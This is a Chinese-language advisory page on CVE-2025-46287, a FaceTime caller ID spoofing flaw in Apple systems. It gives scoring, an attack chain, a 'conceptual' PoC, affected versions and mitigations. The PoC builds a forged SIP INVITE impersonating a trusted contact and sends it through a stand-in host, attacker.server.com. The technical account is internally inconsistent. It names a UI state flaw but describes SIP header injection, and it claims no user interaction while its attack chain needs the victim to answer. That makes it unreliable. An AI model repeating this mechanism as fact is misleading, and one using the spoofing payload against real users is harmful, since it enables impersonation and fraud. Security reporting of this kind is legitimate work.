CVE-2025-46287 Apple FaceTime来电ID欺骗漏洞

漏洞信息

漏洞编号

CVE-2025-46287

漏洞类型

UI欺骗/身份伪装

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Apple iOS, iPadOS, macOS, visionOS, watchOS

漏洞概述

CVE-2025-46287是Apple产品中的一个UI状态管理不一致漏洞。该漏洞由Apple产品安全团队([email protected])发现并报告，于2025年12月12日公开披露。漏洞存在于FaceTime通话功能中，由于用户界面状态管理存在缺陷，攻击者可以伪造来电显示的来电者身份信息（Caller ID）。攻击者利用此漏洞能够在来电显示中冒充任意联系人或机构，可能导致用户被欺骗接听恶意通话，造成隐私泄露或社会工程攻击。CVSS 3.1评分6.5，属于中危级别，攻击复杂度低，无需认证和用户交互即可利用，但影响范围仅限于机密性和完整性的低级别影响。

技术细节

该漏洞的根本原因在于Apple FaceTime应用在处理来电显示状态时存在UI状态管理不一致问题。当收到网络呼叫时，FaceTime未能正确验证和同步来电者身份信息的显示状态。攻击者可以通过构造特制的SIP(Session Initiation Protocol)呼叫请求，在Call-Info或From头字段中注入伪造的身份信息。由于应用层在渲染来电显示时未对身份信息进行充分的完整性校验，导致伪造的Caller ID被正常显示给用户。攻击者利用此漏洞可冒充真实联系人、企业机构或政府机关进行钓鱼攻击或欺诈活动。攻击路径为网络远程利用，无需目标用户进行任何交互操作。

攻击链分析

STEP 1

步骤1

攻击者搭建SIP呼叫服务器，配置伪造的来电显示信息（From头字段设置为目标信任的联系人或机构）

STEP 2

步骤2

攻击者向目标用户发起SIP INVITE呼叫请求，利用FaceTime的Caller ID显示机制

STEP 3

步骤3

FaceTime应用接收到呼叫请求，由于UI状态管理漏洞，未能正确验证From字段的真实性

STEP 4

步骤4

伪造的来电者身份信息被显示在目标用户的FaceTime来电界面上，冒充合法联系人

STEP 5

步骤5

目标用户被欺骗，以为是信任的联系人来电，选择接听通话，导致隐私泄露或被进一步社会工程攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-46287 PoC - FaceTime Caller ID Spoofing (Conceptual) // This is a conceptual proof-of-concept for educational purposes only // SIP INVITE request with forged Caller ID const sipForgedInvite = `INVITE sip:[email protected] SIP/2.0 Via: SIP/2.0/UDP attacker.server.com;branch=z9hG4bK776 Max-Forwards: 70 From: <sip:[email protected]>;tag=12345 To: <sip:[email protected]> Call-ID: [email protected] CSeq: 1 INVITE Contact: <sip:[email protected]> Content-Type: application/sdp v=0 o=- 12345 12345 IN IP4 attacker.server.com s=Session c=IN IP4 attacker.server.com t=0 0 m=audio 49152 RTP/AVP 0 a=rtpmap:0 PCMU/8000`; // Send the forged SIP INVITE to target // In real attack scenario, this would be sent to Apple's FaceTime servers // or directly to target device if on same network console.log('Sending forged FaceTime INVITE with spoofed Caller ID...'); // fetch('https://attacker.server.com/send-sip', { method: 'POST', body: sipForgedInvite });

影响范围

Apple iOS < 18.7.3

Apple iPadOS < 18.7.3

Apple iOS < 26.2

Apple iPadOS < 26.2

Apple macOS Sequoia < 15.7.3

Apple macOS Sonoma < 14.8.3

Apple macOS Tahoe < 26.2

Apple visionOS < 26.2

Apple watchOS < 26.2

防御指南

临时缓解措施

如无法立即更新系统，建议在FaceTime设置中关闭来自非通讯录联系人的呼叫，仅接受已知联系人的来电。同时提高安全意识，对任何声称来自机构或熟人的可疑来电保持警惕，不要仅凭来电显示信息判断来电者身份真实性。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-46287
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-46287
3 Details https://www.cvedetails.com/cve/CVE-2025-46287/
4 VulDB https://vuldb.com/cve/CVE-2025-46287
5 Link https://support.apple.com/en-us/125884
6 Link https://support.apple.com/en-us/125885
7 Link https://support.apple.com/en-us/125886
8 Link https://support.apple.com/en-us/125887
9 Link https://support.apple.com/en-us/125888
10 Link https://support.apple.com/en-us/125890
11 Link https://support.apple.com/en-us/125891